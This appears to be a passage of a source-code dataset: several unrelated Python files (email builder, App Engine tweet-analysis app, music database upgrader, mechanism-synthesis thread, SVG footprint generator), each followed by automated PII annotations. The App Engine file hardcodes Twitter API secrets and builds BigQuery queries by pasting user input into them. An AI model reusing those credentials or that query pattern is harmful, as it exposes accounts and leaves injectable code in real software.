self.body = ''.join([
'--%s%s' % ( boundary, MM_DEFAULT_CRLF ),
self.text.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
self.text.get_part_body(),
'%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF ),
self.html.get_part_header(),
MM_DEFAULT_CRLF,
MM_DEFAULT_CRLF,
self.html.get_part_body(),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
if has_img:
boundary = 'rel_' + gen_boundary_hash()
self.body = ''.join([
'--%s%s' % ( boundary, MM_DEFAULT_CRLF ),
'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),
self.body,
self.create_images_part(boundary),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
self.headers['Content-Type'] = 'multipart/related; boundary="%s"' % (boundary)
if has_att:
boundary = 'att_' + gen_boundary_hash()
self.body = ''.join([
'--%s%s' % (boundary, MM_DEFAULT_CRLF ),
'Content-Type: %s%s%s' % (self.headers['Content-Type'], MM_DEFAULT_CRLF, MM_DEFAULT_CRLF),
self.body,
self.create_attachments_part(boundary),
'%s--%s--%s%s' % ( MM_DEFAULT_CRLF, boundary, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF )
])
self.headers['Content-Type'] = 'multipart/mixed; boundary="%s"' % (boundary)
self.headers['Message-ID'] = self.gen_message_id()
if hasattr(self, 'subject'):
self.headers['Subject'] = encode_header(self.subject, self.charset)
def gen_message_id(self):
return '<%s.%08x@%s>' % (datetime.now().strftime('%Y%m%d%H%M%S'), random.randint(0, sys.maxint), self.kw.get('host', 'localhost'))
def add_recipient(self, email, name = None):
self.recipients[email] = name if name else email
def send(self):
self.build()
extra_headers = self.get_extra_headers()
for email, name in self.recipients.iteritems():
message = '%s%sTo: %s <%s>%s%s%s' % (extra_headers, MM_DEFAULT_CRLF, encode_header(name, self.charset), email, MM_DEFAULT_CRLF, MM_DEFAULT_CRLF, self.body)
s = smtplib.SMTP(self.kw.get('smtp_relay', '127.0.0.1'))
s.sendmail(self.from_email, email, message)
s.quit()
def get_extra_headers(self):
return MM_DEFAULT_CRLF.join([ '%s: %s' % (k, v) for k,v in self.headers.iteritems() ])
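# A minimal usage sketch for the class above, assuming the MM_DEFAULT_*
# constants and the MimemailPartHtml helper imported from .parts/.misc are
# available; the addresses and relay here are placeholders:
#
# mail = Mimemail(host='example.org', smtp_relay='127.0.0.1')
# mail.set_from('noreply@example.org', 'Example Sender')
# mail.set_subject('Test message')
# mail.set_html(MimemailPartHtml('<p>Hello</p>', charset='UTF-8'))
# mail.add_recipient('dummy@email.com', 'Recipient Name')
# mail.send()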
",5966,"[['PERSON', 'OrderedDict'], ['PERSON', 'odict'], ['PERSON', 'odict'], ['LOCATION', 'set_from(self'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['PERSON', 'MM_DEFAULT_CRLF'], ['LOCATION', 'MM_DEFAULT_CRLF'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'self.bo'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ch'], ['URL', 'self.re'], ['URL', 'self.fr'], ['URL', 'self.kw'], ['URL', 'self.ch'], ['URL', 'self.fr'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.su'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.at'], ['URL', 'att.ge'], ['URL', 'att.ge'], ['URL', 'self.ht'], ['URL', 'self.im'], ['URL', 'self.at'], ['URL', 'self.ht'], ['URL', 're.su'], ['URL', 'self.text.pl'], ['URL', 'self.ch'], ['URL', 're.su'], ['URL', 'self.html.pl'], ['URL', 'self.ch'], ['URL', 'self.im'], ['URL', 'image.ge'], ['URL', 'image.ge'], ['URL', 'self.html.pl'], ['URL', 'self.html.pl'], ['URL', 'content.re'], ['URL', 'os.path.ba'], ['URL', 'self.bo'], ['URL', 'self.text.ge'], ['URL', 'self.text.ge'], ['URL', 'self.html.ge'], ['URL', 'self.html.ge'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.bo'], ['URL', 'self.bo'], ['URL', 'self.cr'], ['URL', 'self.ge'], ['URL', 'self.su'], ['URL', 'self.ch'], ['URL', 'datetime.datetime.no'], ['URL', 'sys.ma'], ['URL', 'self.kw.ge'], ['URL', 'self.re'], ['URL', 'self.ge'], ['URL', 'self.recipients.it'], ['URL', 'self.ch'], ['URL', 'self.bo'], ['URL', 'smtplib.SM'], ['URL', 'self.kw.ge'], ['URL', 's.se'], ['URL', 'self.fr'], ['URL', 'CRLF.jo'], ['URL', 'self.headers.it']]"
45,"__author__ = dummy@email.com (J. Matthew Landis)'
import os
import logging
import pickle
import webapp2
import time
import httplib2
import json
import tweepy
import haigha
from collections import Counter
from haigha.connections.rabbit_connection import RabbitConnection
from apiclient import discovery
from oauth2client import appengine
from oauth2client import client
from google.appengine.api import memcache
from google.appengine.api import users
from google.appengine.ext import ndb
from google.appengine.ext.webapp import template
#######################################################################
PROJECTID = '934763316754'
CLIENT_SECRETS = os.path.join(os.path.dirname(__file__), 'client_secrets.json')
# Helpful message to display in the browser if the CLIENT_SECRETS file
# is missing.
MISSING_CLIENT_SECRETS_MESSAGE = """
Warning: Please configure OAuth 2.0
To make this sample run you will need to populate the client_secrets.json file
found at:
%s
with information found on the APIs Console <https://code.google.com/apis/console>.
""" % CLIENT_SECRETS
http = httplib2.Http(memcache)
service = discovery.build(""plus"", ""v1"", http=http)
bigquery_service = discovery.build(""bigquery"",""v2"", http=http)
consumer_key = ""9xNrmD6hE0xnRSYdZt5t0XT0B""
consumer_secret = ""kperqjklvPhBCVvHI96aZIfJu5w1DHI2BZoNMdBEvBPfmuZIYG""
access_token = ""46501499-cijYvv9ixtQKHLSiLt9QaRtcmWeEKvvGZK5s6ukw7""
access_token_secret = ""D127XCAN02BPb0ZtcreCG6dpBJyiiLCeD6ckS2MgdHqwG""
auth = tweepy.OAuthHandler(consumer_key, consumer_secret)
auth.set_access_token(access_token, access_token_secret)
api = tweepy.API(auth)
decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/plus.me',
message=MISSING_CLIENT_SECRETS_MESSAGE)
bq_decorator = appengine.oauth2decorator_from_clientsecrets(
CLIENT_SECRETS,
scope='https://www.googleapis.com/auth/bigquery',
message=MISSING_CLIENT_SECRETS_MESSAGE)
## Function to retrieve and render a template
def render_template(handler, templatename, templatevalues):
path = os.path.join(os.path.dirname(__file__), 'templates/' + templatename)
html = template.render(path, templatevalues)
handler.response.out.write(html)
#######################################################################
## Handles and loads index page
class MainPage(webapp2.RequestHandler):
def get(self):
nickname = ""null""
email = ""null""
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
nickname = ui.fname + " " + ui.lname
email = user.email()
login = users.create_login_url('/')
else:
nickname = user.nickname()
email = user.email()
login = '/createProfile'
else:
ui = None
login = users.create_login_url('/')
logout = users.create_logout_url('/')
os.system(""python stream.py"")
template_values = {
'login': login,
'logout': logout,
'user': user,
'nickname': nickname,
'email': email
}
render_template(self, 'index.html', template_values)
#######################################################################
## Handle user info and profile
class CreateProfile(webapp2.RequestHandler):
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
self.redirect('/profile')
else:
template_data = {'logout': users.create_logout_url('/'), 'nickname': user.nickname()}
template_path = 'templates/createProfile.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## process user profile
## check for user signed in, if so, save the entered information, otherwise, redirect them to the login page
class ProcessUser(webapp2.RequestHandler) :
def post(self) :
user = users.get_current_user()
if user:
fname = self.request.get('fname')
lname = self.request.get('lname')
fname = fname.replace(" ", "")
lname = lname.replace(" ", "")
words = self.request.get_all('word')
if (not(not fname)) & (not(not lname)):
NewUser = UserModel()
NewUser.uid = user.user_id()
NewUser.fname = fname
NewUser.lname = lname
NewUser.words = []
for word in words:
word = word.replace(" ", "")
if word:
NewUser.words+=[word]
NewUser.put()
self.redirect('/profile')
else:
self.redirect('/createProfile')
else:
self.redirect(users.create_login_url('/'))
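# Illustrative request (hedged): ProcessUser expects a POST from
# createProfile.html carrying 'fname', 'lname' and repeated 'word' fields,
# e.g. against a local dev server on the conventional port 8080:
#   curl -d 'fname=Ada&lname=Lovelace&word=tea&word=math' http://localhost:8080/userRegister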
#######################################################################
## Model Data
class DataHandler(webapp2.RequestHandler) :
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get(""inputData"")
queryData = {'query':'SELECT SUM(word_count) as WCount,corpus_date,group_concat(corpus) as Work FROM '
'[publicdata:samples.shakespeare] WHERE word=""'+inputData+'"" and corpus_date>0 GROUP BY corpus_date ORDER BY WCount'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
resp = []
if 'rows' in dataList:
#parse dataList
for row in dataList['rows']:
for key,dict_list in row.iteritems():
count = dict_list[0]
year = dict_list[1]
corpus = dict_list[2]
resp.append({'count': count['v'],'year':year['v'],'corpus':corpus['v']})
else:
resp.append({'count':'0','year':'0','corpus':'0'})
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps(resp))
else:
self.response.write(json.dumps({'error':'No credentials'}))
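# On success /getData answers with JSON rows shaped like
# [{"count": ..., "year": ..., "corpus": ...}, ...] (BigQuery 'v' values),
# otherwise {"error": "No credentials"}.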
#######################################################################
## Model Words
class WordsHandler(webapp2.RequestHandler):  # NOTE: shadowed by the second WordsHandler below, which '/getWords' actually routes to
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get(""inputData"")
queryData = {'query':'SELECT text FROM '
'[doctor-know:rtda.tweets] WHERE Words CONTAINS ""'+inputData+'""GROUP BY text ORDER BY text LIMIT 150'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
# collect the matching tweet texts from the BigQuery result rows
resp = []
if 'rows' in dataList:
for row in dataList['rows']:
for key, dict_list in row.iteritems():
resp.append({'text': dict_list[0]})
self.response.headers['Content-Type'] = 'application/json'
self.response.out.write(json.dumps(resp))
else:
self.response.write(json.dumps({'error':'No credentials'}))
#######################################################################
## Model Words
class WordsHandler(webapp2.RequestHandler):
inputData = "yes"
@bq_decorator.oauth_aware
def get(self) :
if bq_decorator.has_credentials():
http = bq_decorator.http()
inputData = self.request.get(""inputData"")
queryData = {'query':'SELECT text FROM '
'[doctor-know:rtda.tweets] WHERE text CONTAINS ""'+inputData+'"" GROUP BY text ORDER BY text LIMIT 300'}
tableData = bigquery_service.jobs()
dataList = tableData.query(projectId=PROJECTID,body=queryData).execute(http)
tweets = []
if 'rows' in dataList:
#parse dataList
count = 0
for row in dataList['rows']:
for key,dict_list in row.iteritems():
tweet = dict_list[0]
count += 1
tweets.append({'text': tweet})
if count == 300:
break
ignore_words = [ ""fuck"", ""shit"", ""cock"", ""penis"", ""porn""]
words = []
for tweet in tweets:
tt = tweet.get('text', """")
for word in tt.split():
if ""http"" in word:
continue
if word not in ignore_words:
words.append(word)
resp = Counter(words)
self.response.headers['Content-Type'] = 'application/json'
self.response.headers['Access-Control-Allow-Origin'] = '*'
self.response.out.write(json.dumps(resp))
else:
self.response.write(json.dumps({'error': 'No credentials'}))
#######################################################################
## Profile Page
class ProfilePage(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'firstname': ui.fname, 'lastname': ui.lname, 'words': ui.words, 'nickname': ui.fname + " " + ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/profile.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect('/createProfile')
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Artificial Creativity Engine
class DisplayEngine(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'nickname': ui.fname + " " + ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/engine.html'
self.response.out.write(template.render(template_path,template_data))
else:
template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')}
template_path = 'templates/engine.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Data Analysis
class DisplayData(webapp2.RequestHandler) :
def get(self):
user = users.get_current_user()
if user:
res = UserModel.query(UserModel.uid == user.user_id()).fetch()
if res:
ui = res[0]
template_data = {'nickname': ui.fname + " " + ui.lname, 'logout': users.create_logout_url('/')}
template_path = 'templates/data.html'
self.response.out.write(template.render(template_path,template_data))
else:
template_data = {'nickname': user.nickname(), 'logout': users.create_logout_url('/')}
template_path = 'templates/data.html'
self.response.out.write(template.render(template_path,template_data))
else:
self.redirect(users.create_login_url('/'))
#######################################################################
## Establish/Update User Profile
class UserModel(ndb.Model) :
uid = ndb.StringProperty(indexed=True)
fname = ndb.StringProperty(indexed = False)
lname = ndb.StringProperty(indexed = False)
words = ndb.StringProperty(indexed=False,repeated=True)
#######################################################################
## Twitter stream listener (kept disabled)
# class CustomStreamListener(tweepy.StreamListener):
# def __init__(self, api):
# self.api = api
# super(tweepy.StreamListener, self).__init__()
# #setup rabbitMQ Connection
# self.connection = RabbitConnection(host='127.0.0.1', heartbeat=None, debug=True)
# self.channel = self.connection.channel()
# #set max queue size
# args = {""x-max-length"": 2000}
# self.channel.queue.declare(queue='twitter_topic_feed', arguments=args)
# def on_status(self, status):
# print status.text, ""\n""
# data = {}
# data['text'] = status.text
# data['created_at'] = time.mktime(status.created_at.timetuple())
# data['geo'] = status.geo
# data['source'] = status.source
# #queue the tweet
# self.channel.basic.publish(exchange='',
# routing_key='twitter_topic_feed',
# body=json.dumps(data))
# def on_error(self, status_code):
# print >> sys.stderr, 'Encountered error with status code:', status_code
# return True # Don't kill the stream
# def on_timeout(self):
# print >> sys.stderr, 'Timeout...'
# return True # Don't kill the stream
# sapi = tweepy.streaming.Stream(auth, CustomStreamListener(api))
# # my keyword today is chelsea as the team just had a big win
# sapi.filter(track=[self.request.get(""inputData"")])
#######################################################################
app = webapp2.WSGIApplication( [
('/', MainPage),
('/profile', ProfilePage),
('/createProfile', CreateProfile),
('/userRegister', ProcessUser),
('/getData', DataHandler),
('/getWords', WordsHandler),
('/data', DisplayData),
('/engine', DisplayEngine),
(decorator.callback_path, decorator.callback_handler()),
(bq_decorator.callback_path, bq_decorator.callback_handler())
], debug=True)
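# Local-run note (hedged): with the App Engine Python SDK installed, this WSGI
# app is typically served by the development server, e.g.:
#   dev_appserver.py app.yaml
# (the app.yaml routing file is assumed and is not part of this listing)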
",15015,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'J. Matthew Landis'], ['PERSON', 'api = tweepy'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'user.ni'], ['URL', 'users.cr'], ['URL', 'users.cr'], ['URL', 'os.sy'], ['URL', 'stream.py'], ['URL', 'self.red'], ['URL', 'user.cr'], ['URL', 'self.red'], ['URL', 'users.cr'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['LOCATION', 'queryData).execute(http'], ['LOCATION', 'queryData).execute(http'], ['NRP', 'dict_list'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'profile.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'users.cr'], ['URL', 'engine.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'ui = res[0'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'users.cr'], ['URL', 'data.ht'], ['URL', 'self.red'], ['URL', 'users.cr'], ['PERSON', 'StreamListener'], ['PERSON', ""RabbitConnection(host='127.0.0.1""], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'StreamListener'], ['PERSON', ""RabbitConnection(host='127.0.0.1""], ['PERSON', 'sapi'], ['PERSON', 'Stream(auth'], ['DATE_TIME', 'today'], ['PERSON', 'ProcessUser'], ['URL', 'https://code.google.com/apis/console""'], ['URL', ""https://www.googleapis.com/auth/plus.me',""], ['URL', ""https://www.googleapis.com/auth/bigquery',""], ['IP_ADDRESS', '127.0.0.1'], ['IP_ADDRESS', '127.0.0.1'], ['URL', 'email.com'], ['URL', 'haigha.co'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'httplib2.Ht'], ['URL', 'auth.se'], ['URL', 'os.path.jo'], ['URL', 'os.pa'], ['URL', 'template.re'], ['URL', 'handler.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'index.ht'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.red'], ['URL', 'users.cr'], ['URL', 'users.ni'], ['URL', 'createProfile.ht'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'self.request.ge'], ['URL', 'self.request.ge'], ['URL', 'fname.re'], ['URL', 'lname.re'], ['URL', 'self.request.ge'], ['URL', 'user.us'], ['URL', 'word.re'], ['URL', 'self.red'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'samples.sh'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'decorator.ht'], ['URL', 'self.request.ge'], ['URL', 'rtda.tw'], ['URL', 'service.jo'], ['URL', 'row.it'], ['URL', 'tweet.ge'], ['URL', 'resp.headers.ad'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'self.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'self.red'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'webapp2.Re'], ['URL', 'users.ge'], ['URL', 'user.us'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'user.ni'], ['URL', 'self.re'], ['URL', 'template.re'], ['URL', 'ndb.Mo'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'ndb.St'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], 
['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'tweepy.St'], ['URL', 'tweepy.St'], ['URL', 'self.co'], ['URL', 'self.ch'], ['URL', 'self.connection.ch'], ['URL', 'self.channel.queue.de'], ['URL', 'time.mk'], ['URL', 'status.cr'], ['URL', 'status.ge'], ['URL', 'status.so'], ['URL', 'self.channel.ba'], ['URL', 'sys.st'], ['URL', 'sys.st'], ['URL', 'tweepy.streaming.St'], ['URL', 'sapi.fi'], ['URL', 'self.request.ge'], ['URL', 'webapp2.WS'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca'], ['URL', 'decorator.ca']]"
46,"#!/usr/bin/python
# Copyright (c) 2014-2015 Cedric Bellegarde dummy@email.com
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from lollypop.sqlcursor import SqlCursor
class DatabaseUpgrade:
""""""
Manage database schema upgrades
""""""
def __init__(self, version, db):
""""""
Init object
@param version as int
@param db as Database
""""""
self._version = version
self._db = db
# Here are schema upgrade, key is database version,
# value is sql request
self._UPGRADES = {
1: ""update tracks set duration=CAST(duration as INTEGER);"",
2: ""update albums set artist_id=-2001 where artist_id=-999;""
}
""""""
Return upgrade count
@return int
""""""
def count(self):
return len(self._UPGRADES)
""""""
Upgrade database based on version
@return new db version as int
""""""
def do_db_upgrade(self):
with SqlCursor(self._db) as sql:
for i in range(self._version+1, len(self._UPGRADES)+1):
try:
sql.execute(self._UPGRADES[i])
except Exception as e:
print(""Database upgrade failed: "", e)
sql.commit()
return len(self._UPGRADES)
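# Usage sketch (hedged; ``db`` is an opened Lollypop Database and ``version``
# the schema version previously stored for it):
# upgrader = DatabaseUpgrade(version, db)
# new_version = upgrader.do_db_upgrade()  # applies pending _UPGRADES in order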
",1917,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['DATE_TIME', '2014-2015'], ['PERSON', 'Cedric Bellegarde'], ['URL', 'http://www.gnu.org/licenses/'], ['URL', 'email.com'], ['URL', 'sql.com']]"
47,"# -*- coding: utf-8 -*-
""""""Thread of structural synthesis.""""""
__author__ = ""Yuan Chang""
__copyright__ = ""Copyright (C) 2016-2021""
__license__ = ""AGPL""
__email__ = dummy@email.com""
from typing import Sequence, Dict, List
from qtpy.QtCore import Signal
from qtpy.QtWidgets import QWidget, QTreeWidgetItem
from pyslvs.graph import (
link_synthesis,
contracted_link_synthesis,
contracted_graph,
conventional_graph,
Graph,
)
from pyslvs_ui.synthesis.thread import BaseThread
Assortment = Sequence[int]
def assortment_eval(links_expr: str) -> Assortment:
""""""Return link assortment from expr.""""""
return tuple(int(n.split('=')[-1]) for n in links_expr.split("", ""))
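# For example (label names assumed; only the int after '=' matters):
# assortment_eval("NL2=4, NL3=2") == (4, 2)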
class LinkThread(BaseThread):
""""""Link assortment synthesis thread.""""""
progress_update = Signal(int)
result = Signal(dict)
size_update = Signal(int)
def __init__(self, nl: int, nj: int, parent: QWidget):
super(LinkThread, self).__init__(parent)
self.nl = nl
self.nj = nj
def run(self) -> None:
""""""Run and return contracted link assortment.""""""
try:
la_list = link_synthesis(self.nl, self.nj, lambda: self.is_stop)
except ValueError:
self.progress_update.emit(1)
self.result.emit({})
self.finished.emit()
return
self.size_update.emit(len(la_list))
assortment = {}
for i, la in enumerate(la_list):
if self.is_stop:
break
assortment[la] = contracted_link_synthesis(la, lambda: self.is_stop)
self.progress_update.emit(1 + i)
self.result.emit(assortment)
self.finished.emit()
class GraphThread(BaseThread):
""""""Graphs enumeration thread.""""""
progress_update = Signal(int)
count_update = Signal(QTreeWidgetItem, int)
result = Signal(list)
def __init__(self, jobs: Sequence[QTreeWidgetItem], degenerate: int, parent: QWidget):
super(GraphThread, self).__init__(parent)
self.jobs = jobs
self.degenerate = degenerate
def run(self) -> None:
""""""Run and return conventional graph.""""""
cg_list: Dict[Sequence[int], List[Graph]] = {}
answers = []
for i, item in enumerate(self.jobs):
if self.is_stop:
break
root = item.parent()
la = assortment_eval(root.text(0))
cla = assortment_eval(item.text(0))
if la not in cg_list:
cg_list[la] = contracted_graph(la, lambda: self.is_stop)
answer = conventional_graph(
cg_list[la],
cla,
self.degenerate,
lambda: self.is_stop
)
self.count_update.emit(item, len(answer))
answers.extend(answer)
self.progress_update.emit(1 + i)
self.result.emit(answers)
self.finished.emit()
",2931,"[['EMAIL_ADDRESS', 'dummy@email.com'], ['PERSON', 'Yuan Chang'], ['DATE_TIME', '2016-2021'], ['PERSON', 'QtCore'], ['URL', 'self.nl'], ['URL', 'self.nl'], ['URL', 'self.is'], ['URL', 'self.is'], ['URL', 'self.pro'], ['PERSON', 'Sequence[QTreeWidgetItem'], ['URL', 'email.com'], ['URL', 'pyslvs.gr'], ['URL', 'ui.synthesis.th'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.si'], ['URL', 'self.is'], ['URL', 'self.re'], ['URL', 'self.fi'], ['URL', 'self.jo'], ['URL', 'self.de'], ['URL', 'self.jo'], ['URL', 'self.is'], ['URL', 'item.pa'], ['URL', 'self.is'], ['URL', 'self.de'], ['URL', 'self.is'], ['URL', 'self.co'], ['URL', 'self.pro'], ['URL', 'self.re'], ['URL', 'self.fi']]"
48,"#!/usr/bin/env python3
import xml.etree.ElementTree as ET
def get_target():
return SVG()
class SVG:
def __init__(self):
self.svg = ET.parse('skeleton.svg')
self.mmpx = 3.543307
def output(self, path):  # NOTE: shadowed by the second output() defined below
self.svg.write(path)
def add_package(self, package):
'''
Target SVG only handles one drawing at a time, only last added drawing will be part of output
'''
self.svg = ET.parse('skeleton.svg')
self.package = \
{
'name': package['name'],
'pads': [],
'mnt_pads': [],
'holes': [],
'lines': [],
'circles': [],
'rectangles': [] ,
'texts': []
}
def output(self, fout):
package = self.package
for pad in package['pads']:
self.gen_pac_pad(pad)
for mnt_pad in package['mnt_pads']: # TODO, adding mnt_pads not done
self.gen_pac_mnt_pad(mnt_pad)
for hole in package['holes']:
self.gen_pac_hole(hole)
for line in package['lines']:
self.gen_pac_line(line)
if(0):
for circle in package['circles']:
self.gen_pac_circle(circle)
for rect in package['rectangles']:
self.gen_pac_rectangle(rect)
for text in package['texts']:
self.gen_pac_text(text)
self.svg.write(fout)
def add_pac_pad(self, type, angle, size, pos, number):
self.package['pads'].append(
{
'type': type,
'angle': angle,
'size': size,
'pos': pos,
'number': number
})
def add_pac_hole(self, diameter, pos):
self.package['holes'].append(
{
'd': diameter,
'pos': pos
})
def add_pac_line(self, layer, width, vertices):
self.package['lines'].append(
{
'layer': layer,
'width': width,
'vertices': vertices
})
def gen_pac_pad(self, pad): # type, angle, size, pos, number
top_layer = self.svg.find('.//g[@id=""Top""]')
# TODO: Types and angle
el = ET.SubElement(top_layer, 'rect')
el.set('style', 'fill:#ff0000;fill-opacity:1;stroke:none;stroke-width:10;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1')
el.set('id', 'pin_{}'.format(pad['number']))
el.set('width', '{}'.format(pad['size'][0]*self.mmpx))
el.set('height', '{}'.format(pad['size'][1]*self.mmpx))
el.set('x', '{}'.format((pad['pos'][0] - pad['size'][0]/2)*self.mmpx))
el.set('y', '{}'.format((pad['pos'][1] - pad['size'][1]/2)*self.mmpx))
def gen_pac_hole(self, hole):
top_layer = self.svg.find('.//g[@id=""Holes""]')
circle = ET.SubElement(top_layer, 'circle')
circle.set('style', 'fill:#eeee00;fill-opacity:1;stroke:none;stroke-width:0.0;stroke-linecap:square;stroke-miterlimit:4;stroke-dasharray:none;stroke-opacity:1')
circle.set('cx', '{}'.format(hole['pos'][0]*self.mmpx))
circle.set('cy', '{}'.format(hole['pos'][1]*self.mmpx))
circle.set('r', '{}'.format(hole['d']/2*self.mmpx))
def gen_pac_line(self, line):
layer = self.svg.find('.//g[@id="{}"]'.format(line['layer']))  # XPath pattern assumed, by analogy with the literal lookups above
if(line['layer'] == 'Courtyard'):
color = '#e63a81'
elif(line['layer'] == 'Silk'):
color = '#111111'
else:
color = '#000000'
el = ET.SubElement(layer, 'path')
el.set('style', 'fill:none;fill-rule:evenodd;stroke:{color};stroke-width:{}mm;stroke-linecap:butt;stroke-linejoin:miter;stroke-opacity:1;stroke-miterlimit:4;stroke-dasharray:none'.format(line['width'], color=color))
pathdata = ''
first = True
for (x,y) in line['vertices']:
if(first):
